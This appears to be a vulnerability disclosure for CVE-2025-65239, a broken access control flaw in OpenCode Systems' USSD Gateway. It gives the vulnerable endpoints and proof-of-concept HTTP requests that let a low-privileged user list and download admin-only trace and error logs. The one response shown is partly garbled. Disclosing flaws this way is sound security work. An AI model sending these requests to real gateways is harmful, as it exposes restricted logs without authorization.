# \[CVE-2025-65239] USSD Gateway Broken Access Control - Logs

## Description

Broken Access Control in the [USSD Gateway](https://opencode.com/ussi-gateway-function) application offered by [OpenCode Systems ](https://opencode.com/) allows the user who low privileged access to enumerate all the trace/error log files which is restricted to be accessed from the admin accounts. \
<https://www.cve.org/CVERecord?id=CVE-2025-65239>

## Application Details

* **Name**: USSD Gateway
* **Vendor**: OpenCode Systems
* **Version**: OC Release 5 - Version 6.13.11

## Technical Details

* **Vulnerable Endpoint "All files"**: `/occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1`
* **Vulnerable Endpoint "Specific file"**: `/occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace[...].log`

## Exploitation

The vulnerability allows the low privileged user to enumerate the trace and error log files as an admin user.&#x20;

From the low priviliged user, use the below request

```http
GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1 HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]
```

```http
HTTP/2 200 OK
Cache-Control: private-control
Pragna: no-cache
[...]

callback ( '<TABLE width="100% border=0 cellpadding="@" cellspacing=0 align=center › <T R><TD width=100% valign=top align=right › ‹TABLE width="100%" border=0 cellpad ding=2 cellspacing=2 height=30 class=txt> ‹TR><TD valign="top" align=left wid th=70%>Directory: <b>/auxl/ocussd/trace/</b>‹/TD› <TD valign="top" width=30% align=right class=txt>‹b>Server: SERVER-NAME</b></TD></TR> </table></td>‹ /TR> <try<td align=1eft><p> ‹table width="100%" border=0 cell padding=2 cellspacing=2 class=txt align=left><tr class="tablehdr" style="height: 17px;"> «td class="txt_head" style="width: 40%; text-align: center; white-space: novrap;">File Name</td><td class="txt_head" style="width: 20%; text-align: center; white-space: nowrap; "Date</td>td_class="txt head" stvle="width: 10%: text-alion: center: white-snace: [...]

[...]
```

Additionally, you can choose a specific file using the below request

```http
GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace[...].log HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]
```

<figure><img src="https://3235815904-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaajIXL4hyMVEViygzqgu%2Fuploads%2F8zmpl3SdRJ7sA740Gg3J%2Fimage.png?alt=media&#x26;token=4cc98799-cc1c-4ad8-86b6-49486c9977f6" alt=""><figcaption></figcaption></figure>